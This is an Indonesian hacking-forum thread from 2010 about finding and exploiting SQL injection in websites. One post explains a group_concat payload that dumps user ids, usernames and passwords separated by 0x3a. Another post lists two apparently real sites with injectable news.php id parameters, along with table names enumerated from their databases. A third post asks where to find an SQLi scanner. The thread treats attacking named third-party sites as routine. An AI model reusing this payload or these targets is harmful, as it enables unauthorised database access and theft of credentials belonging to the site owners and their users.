[ASK] Cara mencari bug situs

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
heri_mew
Posts: 17
Joined: Sun Apr 18, 2010 4:13 pm
Contact:

Re: [ASK] Cara mencari bug situs

Post by heri_mew » Tue May 11, 2010 12:28 pm

cyber_criminal wrote:tlong jlasin dong ttng fungsi 0x3a..... :cry: :cry: :cry:
ane slalu terhenti di tahap ini pas make sqli :circle: :circle: :circle:
mohon bantuannya ya...

lahh . . . :putusasa:

0x3a kan cuma karakter : (tanda titik dua)
biar gampang pembacaan isi kolom waktu dumping

misal . . . kita dumping isi kolom dengan query spt ini

Code: Select all

group_concat(id,username,pass)
tanpa 0x3a

1adminpasswordku
nah lebih gampang mana pembacaannya dengan ini

Code: Select all

group_concat(id,0x3a,username,0x3a,pass)
1:admin:passwordku

seperti itu . . . lox g salah sey so CMIIW :maaf:

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: [ASK] Cara mencari bug situs

Post by Digital Cat » Tue May 11, 2010 3:15 pm

::==============================================================::
[Web:]
http://www.skw.co.id/news.php?id=91
Tabel : 27
::==============================================================::
information_schema.CHARACTER_SETS
information_schema.COLLATIONS
information_schema.COLLATION_CHARACTER_SET_APPLICABILITY
information_schema.COLUMNS
information_schema.COLUMN_PRIVILEGES
information_schema.KEY_COLUMN_USAGE
information_schema.ROUTINES
information_schema.SCHEMATA
information_schema.SCHEMA_PRIVILEGES
information_schema.STATISTICS
information_schema.TABLES
information_schema.TABLE_CONSTRAINTS
information_schema.TABLE_PRIVILEGES
information_schema.TRIGGERS
information_schema.USER_PRIVILEGES
information_schema.VIEWS
u1637_product.guestbook
u1637_product.kuis
u1637_product.kurs
u1637_product.newproduct
u1637_product.news
u1637_product.news2004
u1637_product.news2006
u1637_product.news2007
u1637_product.produk
u1637_product.tbkode
u1637_product.tips

-----------------------------------------------------------
::==============================================================::
[Web:]http://www.milim.com/news.php?id=100
Tabel : 11
::==============================================================::
information_schema.CHARACTER_SETS
information_schema.COLLATIONS
information_schema.COLUMNS
information_schema.COLUMN_PRIVILEGES
information_schema.KEY_COLUMN_USAGE
information_schema.PROFILING
information_schema.ROUTINES
information_schema.SCHEMATA
information_schema.SCHEMA_PRIVILEGES
information_schema.STATISTICS
information_schema.TABLES

Image

heri_mew
Posts: 17
Joined: Sun Apr 18, 2010 4:13 pm
Contact:

Re: [ASK] Cara mencari bug situs

Post by heri_mew » Wed May 12, 2010 9:08 am

Digital Cat wrote:::==============================================================::
[Web:]
http://www.skw.co.id/news.php?id=91
Tabel : 27
::==============================================================::
information_schema.CHARACTER_SETS
information_schema.COLLATIONS
information_schema.COLLATION_CHARACTER_SET_APPLICABILITY
information_schema.COLUMNS
information_schema.COLUMN_PRIVILEGES
information_schema.KEY_COLUMN_USAGE
information_schema.ROUTINES
information_schema.SCHEMATA
information_schema.SCHEMA_PRIVILEGES
information_schema.STATISTICS
information_schema.TABLES
information_schema.TABLE_CONSTRAINTS
information_schema.TABLE_PRIVILEGES
information_schema.TRIGGERS
information_schema.USER_PRIVILEGES
information_schema.VIEWS
u1637_product.guestbook
u1637_product.kuis
u1637_product.kurs
u1637_product.newproduct
u1637_product.news
u1637_product.news2004
u1637_product.news2006
u1637_product.news2007
u1637_product.produk
u1637_product.tbkode
u1637_product.tips

-----------------------------------------------------------
::==============================================================::
[Web:]http://www.milim.com/news.php?id=100
Tabel : 11
::==============================================================::
information_schema.CHARACTER_SETS
information_schema.COLLATIONS
information_schema.COLUMNS
information_schema.COLUMN_PRIVILEGES
information_schema.KEY_COLUMN_USAGE
information_schema.PROFILING
information_schema.ROUTINES
information_schema.SCHEMATA
information_schema.SCHEMA_PRIVILEGES
information_schema.STATISTICS
information_schema.TABLES

Image
senior Digital cat . . . ad situs SQLi scanner online g??
kmren ak pake yg rieger studio tp skrg webnya dah g ada

ato share dunq :licik: hhe biar bisa multi platform OSnya gag windows doanq :kaca:
hhi

Post Reply

Return to “Web Hacking”